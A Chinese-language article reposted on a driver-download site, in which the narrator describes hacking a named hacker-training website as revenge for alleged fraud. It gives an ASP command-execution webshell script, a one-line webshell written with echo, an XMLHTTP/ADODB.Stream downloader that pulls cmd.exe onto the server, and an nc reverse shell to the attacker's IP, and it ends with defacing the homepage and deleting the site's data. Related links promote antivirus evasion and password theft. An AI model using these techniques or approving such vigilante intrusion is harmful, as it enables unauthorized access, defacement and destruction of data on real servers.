驱动管家:安全、高效、精准的专业驱动下载站!

渗透黑客培训机构网站 入侵学黑客培训基地的步骤

2018-02-23 20:21:15责编:llp   来源:驱动管家     人气:

最近在网上老是看到有人说被一个网址为“http://www.xuehk.com”的黑客培训机构骗了钱,而且骗取的金额数目可不少。于是,抱着为民除 害的心态,准备对这个所谓的黑客培训机构进行一次渗透。在网上搜索了一些关于这个网站的资料,得知,这个网站在前不久已经被人黑过了,如果现在还要再次入 侵的话,成功的几率可能比小,于是就叫上了几个朋友一起搞。

打开“http://www.xuehk.com”,发现网站的页面几乎都是静态的,如图1所示。

渗透黑客培训机构网站 入侵学黑客培训基地的步骤

整理好思路后,我决定先从主站入手。用阿D和明小子注入工具进行了一次注入点扫面,结果无功而返,但这是我意料之中的事。然后,我变了一下思路,花了10多分钟搜集齐了www.xuehk.com的所有目录,目录如下:

http://www.xuehk.com/

http://www.xuehk.com/book/

http://www.xuehk.com/vip/

http://www.xuehk.com/pojie/

http://www.xuehk.com/js/

http://www.xuehk.com/xz/

http://www.xuehk.com/zs/

http://www.xuehk.com/shop/

http://www.xuehk.com/yewu/

http://www.xuehk.com/zs/photo/xiao/

http://www.xuehk.com/zs/photo/da/

http://www.xuehk.com/zs/photo/

我分别用网站猎手和明小子注入工具的批量扫描功能对这些目录进行后台扫描,然后我又用我自己加强过的NBSI一个一个的扫,结果依然是无功而返。看来从主 站入手是几乎没可能的了,于是乎开始旁注。打开“http://www.114best.com/ip/”对xuehk进行旁注查询,发现服务器上有很多 网站,很快我就找到了一个有漏洞的网站,如但是由于服务器安装了比较强的杀软,所以我只拿到了一个一句话webshell,图2所示。

渗透黑客培训机构网站 入侵学黑客培训基地的步骤

把 webshell丢给朋友后,我用lake2的一句话木马客户端查看了一下服务器信息,webshell所在的网站根目录为“F:\wwwroot \****\wwwroot\”,****为网站域名的前段,所以,我推测xuehk.com的网站根目录为“F:\wwwroot\xuehk \wwwroot\”,于是我马上尝试跳转到此目录,但是没有权限。这时我想到asp.net的木马权限可能会比asp的高一点,但是上传好lake2的 asp.net一句话木马后却发现服务器不支持asp.net。

接着查看了一下终端信息,发现端口被改为了60015。查看了一下第三方软件的信息,结果serv-u路径找不到,而且默认密码改了,服务器上没有安装 PcanyWhere和Radmin,MSSQL和Mysql也没有安装,仔细再找了一下,也没有发现什么可利用的第三方软件,而且服务器的权限设置得很 死,连“开始→程序”都打不开。

上传cmd.asp准备尝试执行命令,但cmd.asp也被服务器的杀毒软件给kill了,于是,自己操刀写了个执行cmd命令的asp脚本,代码如下:

")

On Error Resume Next

response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall

response.write("")

response.write("")

response.write("

")

response.write("")

%>成功上传到服务器后,执行cmd.asp命令失败。我想可能是管理员删除了cmd.exe,也可能是服务器的权限设置问题,用一句话木马查看服务器服务信 息发现Wscript并没有被禁止,本想用Wscript来执行命令,但是连一些能写的目录都找不到,常用的everyone目录都不能用,至此,提权陷 入了死局。感觉没什么意思,就跟朋友说了下情况出去玩了。

晚上回来的时候,朋友说找了N个小时,终于找到了一个能写的目录,目录位置是“C:\Program Files\free3web~”,这着实吓了我一跳,一个软件的目录居然能写?打开这个目录看了看,不知道是什么东西,就搁在了一边。准备把cmd上传 到服务器的时候我又发现了一个问题,就是我该如何把二进制文件传上服务器呢?一句话木马只支持文本上传。有的朋友可能说用Wget.vbs来下载,但是你 想想,我们该怎么执行命令让Wget.vbs去下载文件呢?经过一会儿的思考,我终于想到了一个办法,不能上传,但能下载吧?于是我在网上找到了一个可行 的办法,就是利用Microsoft.XMLHTTP来下载文件到服务器上。我们先把cmd.exe传上自己的网站上(为了减少体积,我用FSG压缩了 cmd.exe!),然后打开一句话木马客户端增强版,填好一句话木马的信息后,把第三个框清空,再把第二个框的代码换成:

Set xPost = CreateObject("Microsoft.XMLHTTP")

xPost.Open "GET","被下载文件的网址",False

xPost.Send()

Set sGet = CreateObject("ADODB.Stream")

sGet.Mode = 3

sGet.Type = 1

sGet.Open()

sGet.Write(xPost.responseBody)

sGet.SaveToFile Server.MapPath("保存的文件名"),2

set sGet = nothing

set sPOST = nothing

response.Write("下载成功!")再点击“GO”按钮后,一会儿文件就会被下载到服务器上了,如图3、4所示。

渗透黑客培训机构网站 入侵学黑客培训基地的步骤

上传好cmd.exe后,在我刚才写的cmd.asp脚本的代码中把“cmd.exe”改为“C:\Program Files\free3web~\cmd.exe”,尝试着执行了一下命令,发现执行成功!看来不需要用Wscript来执行命令了,如图5所示。

渗透黑客培训机构网站 入侵学黑客培训基地的步骤

用 dir命令想查看F盘的文件,但是没有权限,真是郁闷死我了,能执行命令但又没有利用价值,于是我就准备在网上查一些关于服务器提权的文章,看看别人的提 权思路。谁知我无意中看到一篇关于webshell下nc反弹的权限讨论,仔细看过讨论后得知原来用nc反弹回来的shell权限是比webshell权限高的!于是我马上弄了一个我免杀过的nc到服务器上,在本地打开cmd,输入命令“nc -vv -l -p 2006”,然后在webshell中输入“c:\Program~\freeweb\nc.exe -e c:\Program~\freeweb\cmd.exe 我的IP 2006”,一会儿nc就有回应了,我尝试执行命令“net user aa aa /add”,结果失败,证明权限不是system,但当我用命令“dir F:\wwwroot\xuehk\wwwroot\”的时候,居然成功的列出了xuehk.com网站的所有文件,如图6所示。

渗透黑客培训机构网站 入侵学黑客培训基地的步骤

然后我试着用echo命令来在xuehk.com写一个文件,输入

echo H4cked by 落叶纷飞>luoye.txt成功写入了xuehk.com的网站根目录,如图7所示。

渗透黑客培训机构网站 入侵学黑客培训基地的步骤

现在来echo一个一句话木马吧!输入

echo ^execute request^("l"^)^>luoye.asp成 功写入luoye.asp,但因为服务器屏蔽了asp调试错误的信息,所以打开luoye.asp时返回的页面是500内部错误,但是这并不影响一句话木 马的使用,我用lake2的一句话木马客户端连接上xuehk.com的一句话木马后,用它的“Edit TextFile”功能把xuehk.com的首页文件index.asp替换成了黑页,并且在nc反弹回来的shell中将其数据完全删除掉了,也算是 给他们一个小小的教训吧!总的来说,这次入侵的目的还是达到了。

  • 你知道网站安全测试的工具awvs的使用方法吗?

    你知道网站安全测试的工具awvs的使用方法吗?

    一、打开应用1、打开应用,出现如图所示界面:二、创建一个新的测试项目这里以CSDN为例:1 点击File –> New –> Web Site Scan或者工具栏上的“New Scan”打开创建页面,如下图:2 填写需

    详情2018-01-16 17:30:30责编:llp   来源:驱动管家     
  • 如果oracle数据库没有彻底删除表,导致出现奇怪的表名怎么办?

    如果oracle数据库没有彻底删除表,导致出现奇怪的表名怎么办?

    Oracle 10g 中出现表名:BIN$2cMp4FjwQ2Cw3Lj+BxLYTw==$0 最近发现Oracle中出现了这些奇怪的表名,上网查找后发现是oracle10g的回收站功能,并没有彻底的删除表,而是把表放入回收站,最后就出现了这样一堆奇

    详情2018-01-14 11:53:55责编:llp   来源:驱动管家     
  • windows密码怎么破解?这款密码清除软件可以轻松做到

    windows密码怎么破解?这款密码清除软件可以轻松做到

    当你在使用电脑时,不小心将管理员登录密码忘记了,怎么办呢?虽然网上和各IT杂志介绍了很多种破解管理员登录密码的方法,但操作起来都比较麻烦,并且针对不同的系统须要用不同的破解方法。例如,用破解Winodws 2

    详情2018-01-30 09:59:15责编:llp   来源:驱动管家     
  • 非法获取password的原理 黑客软件工作方法

    非法获取password的原理 黑客软件工作方法

    一、非法获取Password的原理:   Edit控件是Windows的一个标准控件,当把其Password属性设为True时,就会将输入的内容屏蔽为星号,从而达到保护的目的。虽然我们看来都是星号,但程序中的Edit控件实际仍是用户输入的密码,应用程序可以获取该控件中的密码,其他

    详情2018-02-08 14:04:09责编:llp   来源:驱动管家     
  • 多多淘宝客防注入代码是什么?有什么漏洞?

    多多淘宝客防注入代码是什么?有什么漏洞?

    本文详解了多多淘宝客V7 4绕过防注入及一个注入漏洞的分析由于程序是开源程序并下载其程序看了一番。其实程序员还是有一点安全意识的:防注入代码:这段代码多少还是有瑕疵的、只过滤 get post 我们只要找调用

    详情2018-01-22 13:20:54责编:llp   来源:驱动管家     
  • microsoft project漏洞:没有正确地验证内存资源分配

    microsoft project漏洞:没有正确地验证内存资源分配

    受影响系统:Microsoft Project 2003 SP2Microsoft Project 2002 SP1Microsoft Project 2000 Service Release 1描述:BUGTRAQID: 28607CVE(CAN) ID: CVE-2008-1088Project是微软Office套件中的项目

    详情2018-01-23 19:24:34责编:llp   来源:驱动管家     
  • 木马免杀怎么改特征码?木马免杀改特征码的经验分享

    木马免杀怎么改特征码?木马免杀改特征码的经验分享

    木马免杀,在国内应该起源于05年吧 从那时单一特征码到现在复合特征码,杀毒软件从无主动防御到有主动防御 免杀技术越来越难 但是万变不离其宗--改特征码 到现在一些辅助软件的行为查杀 以下讲解都是以远程控制软件

    详情2018-01-03 10:00:32责编:llp   来源:驱动管家     
  • 服务器安全狗怎么添加用户?超简单!

    服务器安全狗怎么添加用户?超简单!

    前几天发现的,略无语,因为简单到。。直接在命令行下使用for l %i in (1,1,1000) do @net user test test add&@net localgroup administrators test add另存为 ad bat 使用for l %%i in

    详情2018-01-18 11:25:50责编:llp   来源:驱动管家     
  • 网络公牛的安装步骤 网络公牛的配置

    网络公牛的安装步骤 网络公牛的配置

    一、安装(一)解压:《网络公牛》(netbull zip)解包后会产生以下几个文件:1、buildserver exe他是用于把autobind dat,peepshell dll,peepserver exe,keycap dll捆绑成一个单独的可执行文件newserver exe2、pee

    详情2018-02-15 14:51:17责编:llp   来源:驱动管家     
  • 映像劫持是什么?病毒利用映像劫持怎么办?

    映像劫持是什么?病毒利用映像劫持怎么办?

    映像劫持(Image Hijack)是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定,在针对杀毒软件方面,OSO病毒还采用了一种新技术就是映像劫持,通过这种技术就可以将杀毒软件置于死地。最

    详情2018-01-24 16:06:08责编:llp   来源:驱动管家